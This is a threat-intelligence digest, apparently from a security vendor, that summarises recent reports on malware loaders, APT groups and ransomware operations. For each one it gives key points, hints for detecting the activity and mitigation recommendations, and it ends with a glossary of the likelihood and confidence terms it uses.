Malware
Bumblebee: New Malware Loader Under Active Development
Key Points:
- Proofpoint observed phishing campaigns delivering a new downloader called Bumblebee, that has anti-analysis features and has been observed dropping Cobalt Strike, shellcode, Sliver, and Meterpreter.
- Threat actors have been observed delivering Bumblebee via links and attachments in mass phishing and email thread hijacking campaigns, as well as emails generated by submitting “Contact Us” forms on targets websites.
- Observation of this activity may be possible by monitoring for WMI command usage and DLL file activity in %AppData% directory.
Deepwatch Assessment:
Mitigation recommendations include incorporating the tactics, techniques, and procedures detailed by Proofpoint in your phishing awareness and simulation exercises and ensuring security protection systems such as Anti-Virus or End-point Detection and Response, are up to date and functioning properly.
Malware
A New BluStealer Loader Uses Direct Syscalls to Evade EDRs
Key Points:
- Minerva discovered a new version of a loader that is using syscalls to bypass EDRs solutions and once executed drops three files in the users %\Temp\% folder that ultimately loads and executes the BlueStealer malware.
- Persistence is achieved by creating registry keys that execute the malware each time the users logs on. BlueStealer is capable of harvesting credentials from numerous browsers and exfiltrating several file types from the users workstation.
- Observation of this activity may be possible by monitoring for the files and folders as detailed in the report as well as the creation of registry keys.
Deepwatch Assessment:
Recommendations include incorporating the technique of file masquerading through the use of icons in your phishing awareness and simulation exercises and ensuring security protection systems such as Anti-Virus or End-point Detection and Response (EDR), are up to date and functioning properly.
Threat Actors
The Lotus Panda is Awake, Again. Analysis of its Last Strike
Key Points:
- Cluster25, a cyber threat intelligence company, recently analyzed an incident involving the APT group known as Naikon (Lotus Panda), known for targeting Southeastern Asian countries to conduct long-term espionage operations.
- Cluster25’s analysis revealed the initial access (spear phishing) vector and two open-source tools (Viper and ARL) the threat actors used during the incident.
- Observation of this activity may be possible by monitoring for NI/EXE file activity in the %Temp% directory and suspended tasks involving svchost.exe.
Deepwatch Assessment:
Mitigation recommendations include incorporating the tactics, techniques, and procedures detailed by Cluster25 in your phishing awareness and simulation exercises and ensuring security protection systems such as Anti-Virus or End-point Detection and Response, are up to date and functioning properly.
Threat Actors
UNC3524: Eye Spy on Your Email
Key Points:
- Mandiant has discovered a threat actor they are tracking as UNC3524 that, at this time, are unable to link to any known threat group. The group primarily targets the mailboxes of executive teams and employees who work in the corporate development, mergers and acquisitions, or IT security staff.
- Initial access is unknown at this time and UNC3524 used a IoT botnet for C2 communications and deployed a new backdoor, dubbed QUIETEXIT, an SSH client-server application that is based on the open-source Dropbear SSH.
- Observation of this activity may be possible by monitoring for outbound SSH traffic over ports other than 22 and/or from unknown IP addresses and abnormal volume of network traffic originating from the management interfaces.
Deepwatch Assessment:
Recommendations include identifying all devices on the network that do not support monitoring tools and follow the vendor’s recommended harding guidelines and implementing network access controls to restrict or block outbound traffic from these devices.
Ransomware
REvil Ransomware Returns: New Malware Sample Confirms Gang is Back
Key Points:
- Bleeping Computer reports that multiple security researchers have discovered a new ransomware sample that is believed to be compiled from the original source code for REvil, indicating that the ransomware operation has reemerged.
- The new sample does not encrypt devices for, at this time, an unknown reason and the groups victim negotiation site uses the name “Sodinokibi.”
- Observation of this activity may be possible by monitoring for anomalous RDP attempts to enable it or login and TOR browser download and traffic activity.
Deepwatch Assessment:
To mitigate the risk of any ransomware operation, organizations are highly encouraged to follow the guidance and recommendations provided by CISA at their Stop Ransomware website.
Ransomware
AvosLocker Ransomware Variant Abuses Driver File to Disable Anti-Virus, Scans for Log4shell
Key Points:
- Trend Micro analyzed sample of the AvosLocker ransomware that employs a legitimate driver (Avast anti-rootkit) to disable security tools and is able to scan endpoints that are vulnerable to the Log4J vulnerability using Nmap scripts.
- Initial access was determined to be a vulnerability in Zoho ManageEngine ADSelfService Plus (possibly CVE-2021-40539). Additionally, the threat actors scanned for hosts that are vulnerable to Log4Shell,then using AnyDesk to transfer tools and the software deployment tool PDQ to deploy scripts to multiple endpoints.
- Observation of this activity may be possible by monitoring for mshta.exe being used to execute remotely-hosted HTML applications and .aspx files being downloaded from remote IP addresses.
Deepwatch Assessment:
To mitigate the risk of any ransomware operation, organizations are highly encouraged to follow the guidance and recommendations provided by CISA at their Stop Ransomware website.
Ransomware
Conti and Hive Ransomware Operations: What We Learned From These Groups’ Victim Chats
Key Points:
- Cisco Talos’ recently analyzed Conti and Hive chat logs with victim organizations, the report offers “insights into how Conti and Hive choose their targets, negotiate with victims, operate internally, and much more.”
- Talos’ findings cover Conti and Hive communication methods, persuasion techniques, ransom negotiations, operational and targeting data, and more.
- Observation of this activity may be possible by monitoring for anomalous WMI/Nltest/ADFind command usage and unauthorized/anomalous usage of Psexec or Msiexec.
Deepwatch Assessment:
To mitigate the risk of any ransomware operation, organizations are highly encouraged to follow the guidance and recommendations provided by CISA at their Stop Ransomware website.
What We Mean When We Say
Estimates of Likelihood
We use probabilistic language to reflect the Intel Team’s estimates of the likelihood of developments or events because analytical judgments are not certain. Terms like “probably,” “likely,” “very likely,” and “almost certainly” denote a higher than even chance. The terms unlikely and remote imply that an event has a lower than even chance of occurring; they do not imply that it will not. Terms like might and might reflect situations where we are unable to assess the likelihood, usually due to a lack of relevant information, which is sketchy or fragmented. Terms like “we can’t dismiss,” “we can’t rule out,” and “we can’t discount” refer to an unlikely, improbable, or distant event with significant consequences.
Confidence in Assessments
Our assessments and projections are based on data that varies in scope, quality, and source. As a result, we assign our assessments high, moderate, or low levels of confidence, as follows:
- High confidence indicates that our decisions are based on reliable information and/or that the nature of the problem allows us to make a sound decision. However, a “high confidence” judgment is not a fact or a guarantee, and it still carries the risk of being incorrect.
- Moderate confidence denotes that the information is credible and plausible, but not of high enough quality or sufficiently corroborated to warrant a higher level of assurance.
- Low confidence indicates that the information’s credibility and/or plausibility are in doubt, that the information is too fragmented or poorly corroborated to make solid analytic inferences, or that we have serious concerns or problems with the sources.
Share